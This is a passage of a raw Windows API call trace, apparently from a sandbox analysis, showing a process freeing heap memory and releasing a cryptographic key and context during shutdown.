lpProcName="CryptDestroyKey") returned 0x756ffa60 [0088.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0088.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0088.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0088.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0088.821] CryptDestroyKey (hKey=0x41ac640) returned 1 [0088.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0088.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0088.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0088.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0088.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0088.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0088.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0088.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0088.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0088.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0088.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0088.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0088.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0088.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0088.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0088.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0088.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0088.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0088.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0088.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0088.822] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0088.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0088.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0088.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0088.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0088.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0088.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0088.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0088.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0088.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0088.822] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0088.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0088.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0088.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0088.822] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0088.822] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0088.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0088.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0088.822] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0088.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0088.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0088.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0088.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0088.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0088.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0088.823] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0088.823] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0088.823] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0088.823] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0088.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0088.824] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0088.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0088.825] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.825] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0088.825] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0088.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0088.826] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0088.826] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0088.826] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0088.826] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0088.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0088.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0088.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0088.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0088.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0088.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0088.827] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0088.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0088.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0088.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0088.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0088.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0088.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0088.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0088.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0088.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0088.827] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0088.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0088.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0088.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0088.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0088.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0088.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0088.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0088.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0088.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0088.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0088.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0088.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0088.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0088.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0088.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0088.828] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0088.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0088.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0088.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0088.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0088.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0088.828] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0088.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0088.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0088.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0088.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0088.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0088.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0088.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0088.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0088.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0088.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0088.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0088.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 